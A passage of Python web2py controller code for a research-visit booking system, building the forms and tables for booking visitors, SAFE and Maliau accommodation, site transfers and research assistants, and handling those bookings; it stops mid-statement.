DIV(LABEL('Proposer :', _class=\"control-label col-sm-2\"),\n DIV(visit.custom.widget.proposer_id, _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px'),\n DIV(LABEL('Visit title:', _class=\"control-label col-sm-2\"),\n DIV(visit.custom.widget.title, _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px'),\n DIV(LABEL('Dates:', _class=\"control-label col-sm-2\"),\n DIV(DIV(visit.custom.widget.arrival_date,\n SPAN('to', _class=\"input-group-addon input-sm\"),\n visit.custom.widget.departure_date,\n _class=\"input-daterange input-group\",\n _id=\"visit_datepicker\"),\n _class='col-sm-10'),\n _class='row', _style='margin:10px 10px'),\n DIV(LABEL('Purpose:', _class=\"control-label col-sm-2\"),\n DIV(purpose_message, visit.custom.widget.purpose,\n _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px'),\n DIV(DIV(visit.custom.submit, _class=\"col-sm-10 col-sm-offset-2\"),\n _class='row', _style='margin:10px 10px'),\n visit.custom.end,\n _class='panel_body'),\n DIV(download_link, _class='panel-footer'),\n _class=\"panel panel-primary\"),\n visit_js)\n\n #\n # SECTION 3) PROVIDE THE BOOKING CONTROLS \n #\n\n # This consists of a giant form - most panels could work independently \n # but the first two (accom/transfers), need access to a list of selected visitors\n # A) A panel to select and edit the list of visitors\n # B) A panel to book accommodation at SAFE or Maliau\n # C) A panel to book site transfers\n # D) A panel to book research assistants\n # These are followed by tables of existing bookings that allow record deletion\n # E) SAFE Accomodation\n # F) Maliau Accomodation\n # G) Site transfers\n # H) Research assistant bookings\n # I) Submit button panel\n\n # setup icons and the instructions\n delete_icon = SPAN(_class=\"glyphicon glyphicon-remove-sign\",\n _style=\"color:red;\")\n\n replace_icon = SPAN(_class=\"glyphicon glyphicon-refresh\",\n _style=\"color:red;\")\n\n add_visitor_icon = CAT(SPAN(_class=\"glyphicon glyphicon-user\"), XML(' '),\n SPAN(_class=\"glyphicon glyphicon-plus-sign\"))\n\n add_project_icon = CAT(SPAN(_class=\"glyphicon glyphicon-user\"),\n SPAN(_class=\"glyphicon glyphicon-user\"),\n SPAN(_class=\"glyphicon glyphicon-user\"), XML(' '),\n SPAN(_class=\"glyphicon glyphicon-plus-sign\"))\n\n reserve_bed_icon = CAT(SPAN(_class=\"glyphicon glyphicon-bed\"), XML(' '),\n SPAN(_class=\"glyphicon glyphicon-plus-sign\"))\n\n release_bed_icon = CAT(SPAN(_class=\"glyphicon glyphicon-bed\"), XML(' '),\n SPAN(_class=\"glyphicon glyphicon-refresh\"))\n\n reserve_transfer_icon = CAT(SPAN(_class=\"glyphicon glyphicon-road\"), XML(' '),\n SPAN(_class=\"glyphicon glyphicon-plus-sign\"))\n\n reserve_ra_icon = CAT(SPAN(_class=\"glyphicon glyphicon-leaf\"), XML(' '),\n SPAN(_class=\"glyphicon glyphicon-plus-sign\"))\n\n icons = {'delete_icon': delete_icon,\n 'replace_icon': replace_icon,\n 'add_visitor_icon': add_visitor_icon,\n 'add_project_icon': add_project_icon,\n 'reserve_bed_icon': reserve_bed_icon,\n 'release_bed_icon': release_bed_icon,\n 'reserve_transfer_icon': reserve_transfer_icon,\n 'reserve_ra_icon': reserve_ra_icon}\n\n if rv_id is None:\n console = DIV()\n else:\n # Define common elements shared across tables:\n # - an extra column in tables when not readonly to insert delete buttons\n if readonly:\n delete_column_head = \"\"\n else:\n delete_column_head = TH(_width='30px')\n\n # - Each table has it's own local row packing function as the columns vary\n # This local function (and the globally available uname) provide common code within 
row packers\n\n def del_btn(rid, btn_name, readonly):\n\n if readonly:\n delete = \"\"\n else:\n btn_name = btn_name + str(rid)\n delete = TD(TAG.BUTTON(SPAN(_class=\"glyphicon glyphicon-remove-sign\",\n _style=\"color:red;font-size: 1.6em;padding: 0px 10px;\"),\n _type='submit', _name=btn_name, _id=btn_name,\n _style='background:None;padding:0px'))\n\n return delete\n\n # A ) VISITOR PANEL\n # TODO - consider bootstrap modal for prettiness http://plnkr.co/edit/NePR0BQf3VmKtuMmhVR7?p=preview\n\n # get current visitors\n visit_select = db(db.research_visit_member.research_visit_id == rv_id).select()\n\n # Package rows up in a table with row selectors if non read-only\n def pack_visit(r, readonly):\n\n nm = uname(r.user_id, r.id)\n delete = del_btn(r.id, 'delete_visitor_', readonly)\n replace = del_btn(r.id, 'replace_visitor_', readonly)\n\n if not readonly:\n # edit these delete buttons to trigger the java modal warning\n delete.element('BUTTON').attributes['_onclick'] = 'show_alert(this.id)'\n # change the icon in the replace link\n replace.element('span').attributes['_class'] = \"glyphicon glyphicon-refresh\"\n\n chk = '' if readonly else CAT(INPUT(_type='checkbox', _name='records', _value=r.id),\n XML(' '))\n\n # link to H&S \n if r.user_id is None or r.user_id.h_and_s_id is None:\n hs = hs_no\n elif readonly:\n hs = hs_ok\n else:\n hs = A(hs_ok, _href=URL('health_safety', 'health_and_safety', args=r.user_id))\n\n row = TR(TD(LABEL(chk, nm)), TD(hs), delete, replace)\n\n return row\n\n table_rows = [pack_visit(r, readonly) for r in visit_select]\n\n # adjust headings for table and insert controls \n if readonly:\n headings = TR(TH('Visit members'), TH('H&S'))\n else:\n headings = TR(\n TH(LABEL(INPUT(_type='checkbox', _id='checkAll'), XML(' '), 'Select all')),\n TH('H&S'), delete_column_head, delete_column_head)\n\n # get a selector of valid users\n # - look see visits can add anyone, but projects can only add project members\n # - both can add 'Unknown' users to be updated later. 
Users are linked to bookings\n # by the research visit member id field, so can be replaced across the bookings\n # - don't remove people who are already members - needed for replacement\n if record.project_id is None:\n # anyone can join a look see visit\n users = db(db.auth_user.id > 0).select(\n orderby=db.auth_user.last_name | db.auth_user.first_name)\n else:\n # select the rows from auth_users for project members\n users = db((db.project_members.project_id == record.project_id) &\n (db.project_members.user_id == db.auth_user.id)).select(db.auth_user.ALL,\n orderby=db.auth_user.last_name | db.auth_user.first_name)\n\n options = [OPTION(u.last_name + ', ' + u.first_name, _value=u.id) for u in users]\n\n visitor_select = SELECT(OPTION('Unknown', _value=0),\n *options,\n _name='user',\n _class=\"generic-widget form-control input-sm col-sm-3\")\n\n add_visitor = TAG.BUTTON(add_visitor_icon,\n _style='padding: 5px 15px',\n _type='submit', _name='add_visitor')\n\n add_project = TAG.BUTTON(add_project_icon,\n _style='padding: 5px 15px;background:lightgrey;color:black;',\n _type='submit', _name='add_project',\n _title='Add project members')\n\n table_rows.append(TR(TD(visitor_select), TD(add_visitor, _colspan=3)))\n\n # build table\n visitor_table = TABLE(headings, *table_rows, _class='table table-striped')\n\n # combine into the panel\n if readonly:\n visitors = DIV(DIV(H5('Research visit members'), _class=\"panel-heading\"),\n visitor_table,\n # vague TODO - make this table handle squashing better (enable .table-responsive?)\n _class=\"panel panel-primary\", _name='visitors')\n else:\n visitors = DIV(DIV(DIV(H5(SPAN(_class=\"glyphicon glyphicon-question-sign\",\n **{'_data-toggle': \"modal\",\n '_data-target': \"#rv_members_modal\"}),\n XML(' ') * 2, 'Research Visit Members',\n _class='col-sm-8'),\n DIV(DIV(add_project, _class=' pull-right'), _class='col-sm-4'),\n _class='row'),\n _class=\"panel-heading\"),\n visitor_table,\n _class=\"panel panel-primary\")\n\n # B) Accomodation booking form\n\n # create the panel\n accm_pane = DIV(DIV(DIV(H5(SPAN(_class=\"glyphicon glyphicon-question-sign\",\n **{'_data-toggle': \"modal\",\n '_data-target': \"#accom_modal\"}),\n XML(' ') * 2, 'Accommodation requests', _class='col-sm-8'),\n DIV(DIV(TAG.BUTTON(reserve_bed_icon, _type='submit',\n _name='reserve_beds',\n _style='padding: 5px 15px;background:lightgrey;color:black;'),\n XML(' ') * 5,\n TAG.BUTTON(release_bed_icon, _type='submit',\n _name='release_beds',\n _style='padding: 5px 15px;background:lightgrey;color:black;'),\n _class='pull-right'),\n _class='col-sm-4'),\n _class='row'),\n _class=\"panel-heading\"),\n DIV(DIV(LABEL('Dates:', _class='col-sm-2'),\n DIV(DIV(INPUT(type=\"text\", _class=\"form-control input-sm\",\n _name=\"accom_arrive\",\n _onchange='date_change()', _id='accom_arrive'),\n SPAN('to', _class=\"input-group-addon\"),\n INPUT(type=\"text\", _class=\"form-control input-sm\",\n _name=\"accom_depart\",\n _onchange='date_change()', _id='accom_depart'),\n _class=\"input-daterange input-group\",\n _id=\"accom_datepicker\"),\n _class='col-sm-10'),\n _class='row'),\n DIV(DIV(_class='col-sm-2'),\n DIV('Note: these dates are the arrival date and departure dates',\n _class='col-sm-10'),\n _class='row', _style='margin:2px'),\n DIV(LABEL('Location:', _class='col-sm-2'),\n DIV(LABEL(INPUT(_type='radio', _name='location',\n _value='SAFE', value='SAFE', _onclick='locSAFE()'),\n 'SAFE', _class='form-control input-sm'),\n _class=' col-sm-5'),\n DIV(LABEL(INPUT(_type='radio', _name='location',\n 
_value='Maliau', value='SAFE',\n _onclick='locMaliau()'),\n 'Maliau', _class='form-control input-sm'),\n _class=' col-sm-5'),\n _class='row'),\n DIV(LABEL('Options:', _class='col-sm-2'),\n DIV(DIV(LABEL(\n INPUT(_type='radio', _name='maliau_type', _value='Annex',\n value='Annex'),\n 'Annex', _class='form-control input-sm'),\n _class='form_control'),\n DIV(LABEL(\n INPUT(_type='radio', _name='maliau_type', _value='Hostel',\n value='Annex'),\n 'Hostel', _class='form-control input-sm'),\n _class='form_control'),\n _class=' col-sm-5'),\n DIV(DIV(LABEL(INPUT(_type='checkbox', _name='maliau_breakfast'),\n 'Breakfast', _class='form-control input-sm'),\n _class='form_control'),\n DIV(LABEL(INPUT(_type='checkbox', _name='maliau_lunch'),\n 'Lunch', _class='form-control input-sm'),\n _class='form_control'),\n DIV(LABEL(INPUT(_type='checkbox', _name='maliau_dinner'),\n 'Dinner', _class='form-control input-sm'),\n _class='form_control'),\n _class=' col-sm-5'),\n _class='row', _id='maliau_options', _style='display:none;'),\n DIV(LABEL('Availability:', _class='col-sm-2'),\n DIV('Select dates to show SAFE availability', _id='safe_avail',\n _class=' col-sm-10'),\n _class='row', _id='safe_options', _style='display:block;'),\n _class='panel-body'),\n # DIV(_class='panel-footer'),\n _class='panel panel-primary')\n\n # add javascript to power and constrain the daterange picker and hide/reveal maliau options\n accom_js = datepicker_script(html_id='accom_datepicker',\n autoclose='true',\n startDate='\"' + record.arrival_date.isoformat() + '\"',\n endDate='\"' + record.departure_date.isoformat() + '\"')\n\n accom_test = CAT(accm_pane, accom_js)\n\n # C) Site transfer bookings panel\n transfers_panel = DIV(DIV(DIV(H5(SPAN(_class=\"glyphicon glyphicon-question-sign\",\n **{'_data-toggle': \"modal\",\n '_data-target': \"#transfer_modal\"}),\n XML(' ') * 2, 'Site transfer requests (Wed/Sun only)',\n _class='col-sm-8'),\n DIV(DIV(TAG.BUTTON(reserve_transfer_icon, _type='submit',\n _name='book_transfer',\n _style='padding: 5px 15px;background:lightgrey;color:black;'),\n _class='pull-right'),\n _class='col-sm-4'),\n _class='row'),\n _class=\"panel-heading\"),\n DIV(DIV(LABEL('Date:', _class='col-sm-2'),\n DIV(INPUT(type=\"text\", _class=\"form-control input-sm\",\n _name=\"transfer_datepicker\",\n _id=\"transfer_datepicker\"),\n _class='col-sm-4'),\n LABEL('Transfer:', _class='col-sm-2'),\n DIV(SELECT(transfer_set,\n _name='transfer',\n _class=\"form-control input-sm\"),\n _class=\"col-sm-4\"),\n _class='row'),\n DIV(DIV('Please look ', A('here', _href=URL('research_visits',\n 'safe_transfers_schedule'),\n _target=\"_blank\"),\n ' and try to work with existing scheduled transfers.',\n _class=' col-sm-12'),\n _class='row'),\n # DIV(LABEL('Availability:', _class='col-sm-2'),\n # DIV('Select date to show availability', _id='transfer_avail', _class=' col-sm-10'),\n # _class='row'),\n _class='panel-body'),\n _class='panel panel-primary')\n\n # add javascript to constrain datepicker and only let admins add days that aren't We/Su\n if auth.has_membership('admin'):\n transfer_days = '\"\"'\n else:\n transfer_days = '\"12456\"'\n\n transfers_js = datepicker_script(html_id='transfer_datepicker',\n autoclose=\"true\",\n startDate='\"' + record.arrival_date.isoformat() + '\"',\n endDate='\"' + record.departure_date.isoformat() + '\"',\n daysOfWeekDisabled=transfer_days)\n\n transfers_panel = CAT(transfers_panel, transfers_js)\n\n # D) RA booking panel\n ra_panel = DIV(DIV(DIV(H5(SPAN(_class=\"glyphicon glyphicon-question-sign\",\n 
**{'_data-toggle': \"modal\", '_data-target': \"#ra_modal\"}),\n XML(' ') * 2, 'Research Assistant support requests',\n _class='col-sm-8'),\n DIV(DIV(TAG.BUTTON(reserve_ra_icon, _type='submit',\n _name='book_res_assist',\n _style='padding: 5px 15px;background:lightgrey;color:black;'),\n _class='pull-right'),\n _class='col-sm-4'),\n _class='row'),\n _class=\"panel-heading\"),\n DIV(DIV(LABEL('Dates:', _class='col-sm-3'),\n DIV(DIV(INPUT(type=\"text\", _class=\"form-control input-sm\",\n _name=\"ra_start\", _id='ra_start'),\n SPAN('to', _class=\"input-group-addon\"),\n INPUT(type=\"text\", _class=\"form-control input-sm\",\n _name=\"ra_end\", _id='ra_stop'),\n _class=\"input-daterange input-group\", _id=\"ra_datepicker\"),\n _class='col-sm-9'),\n _class='row'),\n DIV(_class='row', _style='margin:2px'),\n DIV(LABEL('Site and time:', _class='col-sm-3'),\n DIV(SELECT(res_assist_set,\n _name='ra_site_time',\n _class=\"form-control input-sm\"),\n _class=\"col-sm-9\"),\n _class='row'),\n DIV(_class='row', _style='margin:2px'),\n DIV(LABEL('Work type:', _class='col-sm-3'),\n DIV(LABEL(INPUT(_type='radio', _name='ra_work_type',\n _value='Standard', value='Standard'),\n 'Standard', _class='form-control input-sm'),\n _class='col-sm-3'),\n DIV(LABEL(INPUT(_type='radio', _name='ra_work_type',\n _value='Rope work', value='Standard'),\n 'Rope work', _class='form-control input-sm'),\n _class='col-sm-3'),\n DIV(LABEL(INPUT(_type='radio', _name='ra_work_type',\n _value='Night work', value='Standard'),\n 'Night work', _class='form-control input-sm'),\n _class='col-sm-3'),\n _class='row'),\n _class='panel-body'),\n # DIV(_class='panel-footer'),\n _class='panel panel-primary')\n\n ra_js = datepicker_script(html_id='ra_datepicker',\n autoclose=\"true\",\n startDate='\"' + record.arrival_date.isoformat() + '\"',\n endDate='\"' + record.departure_date.isoformat() + '\"')\n\n ra_panel = CAT(ra_panel, ra_js)\n\n #\n # NOW BUILD THE TABLES OF THE EXISTING BOOKINGS\n #\n\n # Get the SAFE costs message:\n # - Get the number of beds for malaysian, international and unknown visitors\n # - The query below gets counts for malaysian_researcher is True, False and \n # None (missing)\n # qry = db(db.bed_reservations_safe.research_visit_id == rv_id)\n #\n # rws = qry.select((db.bed_reservations_safe.departure_date - db.bed_reservations_safe.arrival_date).sum(),\n # db.auth_user.malaysian_researcher,\n # db.\n # join = db.research_visit_member.on(\n # db.bed_reservations_safe.research_visit_member_id == db.research_visit_member.id),\n # left = db.auth_user.on(db.research_visit_member.user_id == db.auth_user.id),\n # groupby=db.auth_user.malaysian_researcher)\n\n # Are any SAFE beds booked?\n # if len(rws) > 0:\n # # simplify row data to a dictionary\n # rw_data = {rw.auth_user.malaysian_researcher: rw._extra.values()[0] for rw in rws}\n #\n # # load costs from the json data\n # f = os.path.join(request.folder, 'static', 'info', 'costs.json')\n # costs_dict = simplejson.load(open(f))\n # daily_costs = {True: costs_dict['safe_costs']['local_food']['cost'],\n # False: costs_dict['safe_costs']['food']['cost'],\n # None: costs_dict['safe_costs']['food']['cost']}\n #\n # # get the summary for the message grouped by international, local\n # # add group specific rows.\n # safe_cost_alt = {False: \"International researchers: {:d} person nights at RM {} per night\",\n # True: \"Malaysian researchers: {:d} person nights at RM {} per night\",\n # None: \"Unknowns: {:d} person nights at RM {} per night\"}\n #\n # safe_cost_breakdown = 
[safe_cost_alt[ky].format(int(rw_data[ky]), daily_costs[ky]) for ky in rw_data]\n #\n # safe_cost_msg = DIV(P(\"With effect from 1st August 2017, accomodation costs for \",\n # \"the SAFE camp \", TAG.u(B(\"must be paid in cash on arrival\")),\n # \". The SAFE accomodation costs for this proposal are \",\n # B(\"RM \" + str(sum([daily_costs[ky] * rw_data[ky] for ky in rw_data]))),\n # \" (\", \", \".join(safe_cost_breakdown), \")\",\n # \". Please ensure you bring this amount with you to camp.\"),\n # _class=\"alert alert-info\", _role=\"alert\")\n # else:\n # safe_cost_msg = DIV()\n\n # E ) Booked SAFE accommodation\n\n # grab the rows joined to the RVM table to get user references and to the\\\n # user table to get International/Malaysian/None (Unknown)\n qry = db(db.bed_reservations_safe.research_visit_id == rv_id)\n\n safe_select = qry.select(join=db.research_visit_member.on(\n db.bed_reservations_safe.research_visit_member_id == db.research_visit_member.id),\n left=db.auth_user.on(db.research_visit_member.user_id == db.auth_user.id))\n\n def pack_safe(r, readonly):\n\n nm = uname(r.research_visit_member.user_id, r.research_visit_member.id)\n delete = del_btn(r.bed_reservations_safe.id, 'delete_safe_', readonly)\n row = TR(TD(nm), TD(r.bed_reservations_safe.arrival_date),\n TD(r.bed_reservations_safe.departure_date), delete)\n\n return row\n\n if len(safe_select) > 0:\n\n # get the total days per group\n days = {False: 0, True: 0, None: 0}\n for rw in safe_select:\n n_days = (\n rw.bed_reservations_safe.departure_date - rw.bed_reservations_safe.arrival_date)\n days[rw.auth_user.malaysian_researcher] += (n_days.days - 1)\n\n # drop empty groups\n days = {ky: vl for ky, vl in days.items() if vl > 0}\n\n # get costs\n f = os.path.join(request.folder, 'static', 'info', 'costs.json')\n costs_dict = simplejson.load(open(f))\n daily_costs = {True: costs_dict['safe_costs']['local_food']['cost'],\n False: costs_dict['safe_costs']['food']['cost'],\n None: costs_dict['safe_costs']['food']['cost']}\n\n # summary text by group\n safe_cost_alt = {\n False: \"International researchers: {:d} person nights at RM {} per night\",\n True: \"Malaysian researchers: {:d} person nights at RM {} per night\",\n None: \"Unknowns: {:d} person nights at RM {} per night\"}\n safe_cost_breakdown = [safe_cost_alt[ky].format(int(days[ky]), daily_costs[ky]) for ky\n in days]\n\n # build the full cost message\n total_cost = sum([daily_costs[ky] * days[ky] for ky in days])\n safe_cost_msg = P(\"With effect from 1st August 2017, accomodation costs for \",\n \"the SAFE camp \", TAG.u(B(\"must be paid in cash on arrival\")),\n \". The SAFE accomodation costs for this proposal are \",\n TAG.u(B(\"RM \" + str(total_cost))),\n \" (\", \", \".join(safe_cost_breakdown), \"). \")\n if total_cost <= 1500:\n safe_cost_msg.append(\"Please ensure you bring this amount with you to camp.\")\n else:\n safe_cost_msg.append(\n (\"You will need to pay RM1500 of this as a deposit on arrival, \"\n \"so please ensure you bring this amount with you to camp. 
\"\n \"The balance must be paid off over the course of your visit.\"))\n\n safe_table = DIV(DIV(H5('Requested accomodation at SAFE'), _class=\"panel-heading\"),\n TABLE(TR(TH('Visitor'), TH('Arrival date'), TH('Departure date'),\n delete_column_head),\n *[pack_safe(r, readonly) for r in safe_select],\n _class='table table-striped'),\n DIV(safe_cost_msg, _class='panel-body'),\n _class=\"panel panel-primary\")\n else:\n safe_table = DIV()\n safe_cost_msg = \"\"\n\n # F) Booked MALIAU Accommodation\n\n # grab the rows and pack into a table\n maliau_select = db((db.bed_reservations_maliau.research_visit_id == rv_id) &\n (\n db.bed_reservations_maliau.research_visit_member_id == db.research_visit_member.id)).select()\n\n def pack_maliau(r, readonly):\n\n nm = uname(r.research_visit_member.user_id, r.research_visit_member.id)\n delete = del_btn(r.bed_reservations_maliau.id, 'delete_maliau_', readonly)\n row = TR(TD(nm), TD(r.bed_reservations_maliau.arrival_date),\n TD(r.bed_reservations_maliau.departure_date),\n TD(r.bed_reservations_maliau.type),\n TD(['B' if r.bed_reservations_maliau.breakfast else ''] +\n ['L' if r.bed_reservations_maliau.lunch else ''] +\n ['D' if r.bed_reservations_maliau.dinner else '']),\n delete)\n\n return row\n\n if len(maliau_select) > 0:\n # keep this in two parts to reuse in approval emails to MBCA\n maliau_table = TABLE(TR(TH('Visitor'), TH('Arrival date'), TH('Departure date'),\n TH('Type'), TH('Food'), delete_column_head),\n *[pack_maliau(r, readonly) for r in maliau_select],\n _class='table table-striped')\n maliau_div = DIV(DIV(H5('Requested accommodation at Maliau'), _class=\"panel-heading\"),\n maliau_table,\n _class=\"panel panel-primary\")\n else:\n maliau_div = DIV()\n\n # G) Booked transfers\n\n # grab the rows and pack into a table\n transfer_select = db((db.transfers.research_visit_id == rv_id) &\n (\n db.transfers.research_visit_member_id == db.research_visit_member.id)).select()\n\n def pack_transfer(r, readonly):\n\n nm = uname(r.research_visit_member.user_id, r.research_visit_member.id)\n delete = del_btn(r.transfers.id, 'delete_transfer_', readonly)\n row = TR(TD(nm), TD(r.transfers.transfer), TD(r.transfers.transfer_date), delete)\n\n return row\n\n if len(transfer_select) > 0:\n transfer_table = DIV(DIV(H5('Requested Site Transfers'), _class=\"panel-heading\"),\n TABLE(TR(TH('Visitor'), TH('Transfer'), TH('Transfer date'),\n delete_column_head),\n *[pack_transfer(r, readonly) for r in transfer_select],\n _class='table table-striped'),\n _class=\"panel panel-primary\")\n else:\n transfer_table = DIV()\n\n # H) Booked research assistants\n res_assist_select = db(db.research_assistant_bookings.research_visit_id == rv_id).select()\n\n def pack_ra(r, readonly):\n\n delete = del_btn(r.id, 'delete_ra_', readonly)\n row = TR(TD(r.site_time), TD(r.start_date), TD(r.finish_date), TD(r.work_type), delete)\n\n return row\n\n if len(res_assist_select) > 0:\n ra_table = DIV(DIV(H5('Requested Research Assistant support'), _class=\"panel-heading\"),\n TABLE(TR(TH('Details'), TH('Start date'), TH('Finish date'),\n TH('Work type'), delete_column_head),\n *[pack_ra(r, readonly) for r in res_assist_select],\n _class='table table-striped'),\n _class=\"panel panel-primary\")\n else:\n ra_table = DIV()\n\n # I) SUBMIT BUTTON PANEL \n\n # switch the button class from active to inactive based on\n # number of researchers named and at least some accomodation\n number_of_visitors = db(db.research_visit_member.research_visit_id == rv_id).count()\n nights_at_safe = 
db(db.bed_reservations_safe.research_visit_id == rv_id).count()\n nights_at_maliau = db(db.bed_reservations_maliau.research_visit_id == rv_id).count()\n\n if number_of_visitors and (nights_at_safe + nights_at_maliau):\n submit_proposal_button = TAG.BUTTON('Submit proposal', _type='submit',\n _name='submit_proposal',\n _class='btn btn-success btn-md active')\n submit_panel_text = P(\n 'Double check you have listed all of the researchers coming to the '\n 'field and provided details of all accommodation, transfers and RA '\n ' support needed and then press the button below to submit your proposal.',\n _style='padding: 3px 10px 3px 10px;')\n else:\n submit_proposal_button = TAG.BUTTON('Enter details to submit', _type='submit',\n _name='submit_proposal',\n _class='btn btn-success btn-md disabled',\n _disabled='disabled')\n submit_panel_text = P(\n 'You have not identified any researchers taking part in the research visit '\n 'or requested any accommodation. You will not be able to submit your proposal '\n 'until you provide the details listed at the top of the page.',\n _style='padding: 3px 10px 3px 10px;')\n\n submit_panel = DIV(DIV(DIV(submit_panel_text, _class='row'),\n DIV(CENTER(submit_proposal_button), _class='row'),\n _class='panel-body'),\n _class='panel panel-primary')\n\n #\n # SECTION 4) EXPOSE THE DETAILS (AND CONTROLS IF NOT READONLY)\n # AND PROVIDE THE FORM LOGIC FOR HANDLING THE VARIOUS CONTROLS\n\n if readonly:\n console = CAT(H3('Proposed research visit details'),\n DIV(visitors),\n DIV(safe_table),\n DIV(maliau_div),\n DIV(transfer_table),\n DIV(ra_table))\n\n else:\n # combine the panels into a single form, along with a hidden field containing\n # the research visit id to allow the validation to cross check.\n # - insert anchors between panels to bring the URL back to the pane that was edited\n\n # add a big banner warning about draft status\n if record.admin_status == 'Draft':\n draft_banner = DIV(H4('Warning: Draft proposal'), (\"This is currently \"\n \"a draft research visit proposal, allowing you to come back \"\n \"to edit and update the details. Once you have finished the \"\n \"proposal you \"),\n TAG.U('must press the submit button '), ('below. 
'\n \"The admin team will not see your proposal until it is submitted \"\n \"and your proposal must be submitted and approved before you come \"\n \"to the field.\"),\n _class=\"alert alert-info\", _style='background:gray',\n _role=\"alert\")\n\n else:\n draft_banner = DIV()\n\n console = FORM(A(_name='console'),\n H3('Proposed research visit details'),\n draft_banner,\n DIV(DIV(visitors, _class='col-sm-5'),\n DIV(DIV(accom_test, _class='row'),\n DIV(transfers_panel, _class='row'),\n DIV(ra_panel, _class='row'),\n _class='col-sm-7'),\n _class='row'),\n DIV(safe_table),\n DIV(maliau_div),\n DIV(transfer_table),\n DIV(ra_table),\n draft_banner,\n DIV(submit_panel),\n INPUT(_name='id', _id='id', _value=rv_id, _type='hidden'),\n _id='console')\n\n # console validation\n if console.process(onvalidation=validate_research_visit_details_console,\n formname='console').accepted:\n\n # intialise a list to gather history for changes\n new_history = []\n\n # add user and project share the same code, so create a local function\n def add_user(uid):\n\n new_id = db.research_visit_member.insert(research_visit_id=rv_id,\n user_id=uid)\n # update the history\n record = db.research_visit_member(new_id)\n name = uname(record.user_id, record.id)\n new_history = ' -- New visitor added: {}\\\\n'.format(name)\n\n return (new_history)\n\n # --------------------------------\n # The action to take gets identified by the validator and stored \n # in the form as console.action\n # --------------------------------\n\n if console.action == 'delete':\n # --------------------------------\n # The user has pressed one of the delete buttons and \n # there is a delete component to the form giving the table \n # and row id to be deleted \n # --------------------------------\n\n table_dict = {'transfer': 'transfers',\n 'visitor': 'research_visit_member',\n 'safe': 'bed_reservations_safe',\n 'maliau': 'bed_reservations_maliau',\n 'ra': 'research_assistant_bookings'}\n\n # get the information formatted\n del_type = console.delete[0]\n del_tab = table_dict[del_type]\n del_id = int(console.delete[1])\n\n # if not an RA booking, look up the name of the RVM\n if del_type == 'visitor':\n r = db(db.research_visit_member.id == del_id).select().first()\n name = uname(r.user_id, r.id)\n elif del_type != 'ra':\n r = db(\n (db.research_visit_member.id == db[del_tab].research_visit_member_id) &\n (db[del_tab].id == del_id)).select().first()\n name = uname(r.research_visit_member.user_id, r.research_visit_member.id)\n\n # delete the record\n del_record = db[del_tab][del_id]\n del_record.delete_record()\n\n # get the history \n if del_type == 'ra':\n new_history.append(' -- RA cancelled {} from {} to {}\\\\n'.format(\n del_record.site_time, del_record.start_date, del_record.finish_date))\n elif del_type == 'transfer':\n new_history.append(' -- Transfer cancelled for {} from {} on {}\\\\n'.format(\n name, del_record.transfer, del_record.transfer_date))\n elif del_type == 'visitor':\n new_history.append(' -- Visitor removed: {}\\\\n'.format(name))\n elif del_type == 'accom_safe':\n new_history.append(\n ' -- SAFE bed cancelled for {} between {} - {} \\\\n'.format(\n name, del_record.arrival_date, del_record.departure_date))\n elif del_type == 'accom_safe':\n new_history.append(\n ' -- Maliau bed cancelled for {} between {} - {} \\\\n'.format(\n name, del_record.arrival_date, del_record.departure_date))\n\n # --------------------------------\n # THREE (NON-DELETE) ACTIONS THAT AMEND THE VISITORS\n # --------------------------------\n\n elif 
console.action == 'add_visitor':\n\n new_history.append(add_user(console.vars.user))\n\n elif console.action == 'add_project':\n\n for uid in console.vars.user:\n new_history.append(add_user(uid))\n\n elif console.action == 'replace_visitor':\n\n # the current and replacement user ids are passed \n # from the validator in console.vars.user as a 2-list:\n # [row id in research_visit_member to update, user_id to insert]\n\n rvm_record = db.research_visit_member(console.vars.user[0])\n old_name = uname(rvm_record.user_id, rvm_record.id)\n\n replace_uid = console.vars.user[1]\n replace_uid = None if replace_uid == 0 else replace_uid\n rvm_record.update_record(user_id=replace_uid)\n rvm_record = db.research_visit_member(console.vars.user[0])\n new_name = uname(rvm_record.user_id, rvm_record.id)\n\n # TODO - could potentially merge reservation records here\n\n # update the history\n new_history.append(\n ' -- Visitor replaced: {} >> {}\\\\n'.format(old_name, new_name))\n\n # --------------------------------\n # TWO ACTIONS THAT BOOK ACCOMODATION\n # --------------------------------\n\n elif console.action == 'reserve_beds':\n\n # loop over research_visit_member_ids, creating a dict of fields to insert\n # via the __book_beds function\n for rid in console.vars.records:\n\n rvm_record = db.research_visit_member(rid)\n name = uname(rvm_record.user_id, rvm_record.id)\n\n flds = dict(arrival_date=console.vars.accom_arrive,\n departure_date=console.vars.accom_depart,\n research_visit_id=rv_id,\n research_visit_member_id=rid)\n\n if console.vars.location == 'SAFE':\n\n __book_beds(site_table='bed_reservations_safe', flds=flds)\n\n new_history.append(' -- SAFE bed booked for {} from {} to {}\\\\n'.format(\n name, console.vars.accom_arrive, console.vars.accom_depart))\n\n else:\n flds.update(dict(type=console.vars.maliau_type,\n breakfast=console.vars.maliau_breakfast,\n lunch=console.vars.maliau_lunch,\n dinner=console.vars.maliau_dinner))\n\n __book_beds(site_table='bed_reservations_maliau', flds=flds)\n\n new_history.append(\n ' -- Maliau bed booked for {} from {} to {} \\\\n'.format(\n name, console.vars.accom_arrive, console.vars.accom_depart))\n\n elif console.action == 'release_beds':\n\n # loop over research_visit_member_ids, creating a dict of fields to process\n # via the __book_beds function\n\n for rid in console.vars.records:\n\n rvm_record = db.research_visit_member(rid)\n name = uname(rvm_record.user_id, rvm_record.id)\n\n flds = dict(arrival_date=console.vars.accom_arrive,\n departure_date=console.vars.accom_depart,\n research_visit_member_id=rid)\n\n if console.vars.location == 'SAFE':\n __release_beds(site_table='bed_reservations_safe', flds=flds)\n new_history.append(\n ' -- SAFE beds released for {} between {} to {}\\\\n'.format(\n name, console.vars.accom_arrive, console.vars.accom_depart))\n else:\n __release_beds(site_table='bed_reservations_maliau', flds=flds)\n new_history.append(\n ' -- Maliau beds released for {}, {} between {} to {} \\\\n'.format(\n name, console.vars.accom_arrive, console.vars.accom_depart))\n\n # --------------------------------\n # ACTION TO BOOK TRANSFERS\n # --------------------------------\n\n elif console.action == 'book_transfer':\n\n # loop over selected rows from user panel and book transfers\n for rid in console.vars.records:\n rvm_record = db.research_visit_member(rid)\n\n db.transfers.insert(transfer=console.vars.transfer,\n research_visit_id=rv_id,\n research_visit_member_id=rid,\n transfer_date=console.vars.transfer_datepicker)\n\n name = 
